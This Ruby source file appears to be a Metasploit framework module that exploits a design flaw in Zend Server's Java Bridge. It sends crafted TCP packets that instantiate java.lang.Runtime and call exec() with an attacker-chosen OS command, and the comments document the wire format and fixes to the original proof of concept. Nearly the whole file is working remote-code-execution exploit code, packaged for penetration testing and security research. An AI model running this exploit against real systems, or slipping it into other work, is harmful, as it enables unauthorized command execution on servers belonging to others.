
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/zend/java_bridge.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
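class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp

  # Wire format, as far as this module demonstrates it: every request is a
  # 32-bit big-endian byte count followed by the bytes it counts, and the
  # method-name strings inside are likewise 32-bit-big-endian-length-prefixed.
  # The original PoC wrote those counts as byte-swapped constants packed with
  # 'V' (0x33000000 -> 51 bytes, 0x16000000 -> 22, 0x11000000 -> 17); the
  # 'N' form used below emits identical bytes and lets the count be computed
  # from the fields instead of hand-maintained. The remaining markers
  # (0x04 / 0x07 / 0xffffffff / the trailing zero words) are reproduced from
  # the PoC as-is; their meaning is not documented here.

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Zend Server Java Bridge Design Flaw Remote Code Execution',
      'Description' => %q{
        This module abuses a flaw in the Zend Java Bridge Component of
        the Zend Server Framework. By sending a specially crafted packet, an
        attacker may be able to execute arbitrary code.

        NOTE: This module has only been tested with the Win32 build of the software.
      },
      'Author' => [ 'ikki', 'MC' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'OSVDB', '71420'],
          [ 'ZDI', '11-113' ],
          [ 'EDB', '17078' ],
        ],
      'DisclosureDate' => '2011-03-28'))

    register_options(
      [
        Opt::RPORT(10001),
        OptString.new('CMD', [ false, 'The OS command to execute', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),
      ])
  end

  # Drives the three-step exchange against the bridge:
  # CreateObject("java.lang.Runtime") -> getRuntime() -> exec(CMD), followed
  # by a best-effort "reset" so the created object is not left behind.
  #
  # Returns nothing; progress and failures are reported through print_*.
  # An empty CMD aborts before connecting. A reply too short to carry the
  # 4-byte id at offset 5 aborts the run with an error (the PoC crashed with
  # a TypeError on nil there). The socket is always released, including when
  # a later step raises.
  #
  # Success is judged loosely: three consecutive NUL bytes anywhere in the
  # exec() reply. Treat "Cleaning up the JVM" as "the bridge accepted the
  # call", not as proof the OS command ran.
  def run
    cmd = datastore['CMD'].to_s
    if cmd.empty?
      print_error('CMD is empty; nothing to execute')
      return
    end

    connect
    begin
      print_status("Creating the Java Object 'java.lang.Runtime'")
      sock.put(create_object_request)
      classid = read_object_id('CreateObject')
      return if classid.nil?

      print_status("Invoking static method 'getRuntime()'")
      sock.put(get_runtime_request(classid))
      methodid = read_object_id('getRuntime')
      return if methodid.nil?

      print_status("Invoking method 'exec()' with parameter '#{cmd}'")
      sock.put(exec_request(methodid, cmd))
      reply = sock.get_once || ''

      if reply =~ /\x00\x00\x00/
        print_status("Cleaning up the JVM")
        sock.put(reset_request)
      else
        print_error("Failed to run command...")
      end
    ensure
      disconnect
    end
  end

  private

  # Prefixes +body+ with its own byte count as a 32-bit big-endian word,
  # which is how every request in this exchange is framed.
  def frame(body)
    [body.bytesize].pack('N') + body
  end

  # A method-name string as the bridge expects it: 32-bit big-endian byte
  # count followed by the raw bytes.
  def bridge_string(str)
    [str.bytesize].pack('N') + str.b
  end

  # CreateObject("java.lang.Runtime") request: 51 bytes after the frame
  # length, matching the PoC's hard-coded 0x33.
  def create_object_request
    body = [0].pack('N')
    body << bridge_string('CreateObject')
    body << [2].pack('N') << [0x00000004].pack('V') # reproduced from the PoC; meaning unknown
    body << "\x11" << 'java.lang.Runtime' << "\x07"  # 1-byte length (17) then a 0x07 marker
    body << [0].pack('N')
    frame(body)
  end

  # getRuntime() on the class id returned by CreateObject: 22 bytes after the
  # frame length, matching the PoC's 0x16.
  def get_runtime_request(classid)
    body = classid.b
    body << bridge_string('getRuntime')
    body << [0].pack('N')
    frame(body)
  end

  # exec(cmd) on the runtime id returned by getRuntime. The fixed part is
  # 21 bytes; the PoC added cmd.length (characters, not bytes) and packed the
  # argument length as 16 bits, so multibyte or >64 KiB commands were
  # mis-framed. Both lengths are now byte counts in 32-bit big-endian form,
  # which is byte-identical to the PoC for ASCII commands under 64 KiB.
  def exec_request(methodid, cmd)
    payload = cmd.b
    body = methodid.b
    body << bridge_string('exec')
    body << [1].pack('N') # presumably the argument count; one string follows
    body << "\x04" << [payload.bytesize].pack('N') << payload
    frame(body)
  end

  # "reset" against the 0xffffffff pseudo-id: 17 bytes after the frame
  # length, matching the PoC's 0x11. Sent only after a successful exec().
  def reset_request
    body = [0xffffffff].pack('N')
    body << bridge_string('reset')
    body << [0].pack('N')
    frame(body)
  end

  # Reads one reply and returns the 4-byte id the bridge places at byte
  # offset 5, or nil (after logging) when the reply is shorter than the
  # 9 bytes needed to hold it. +step+ names the request for the message.
  def read_object_id(step)
    reply = (sock.get_once || '').b
    if reply.bytesize < 9
      print_error("Short or empty reply to #{step} (#{reply.bytesize} bytes); the target may not be vulnerable or RPORT is not the Java Bridge")
      return nil
    end
    reply[5, 4]
  end
end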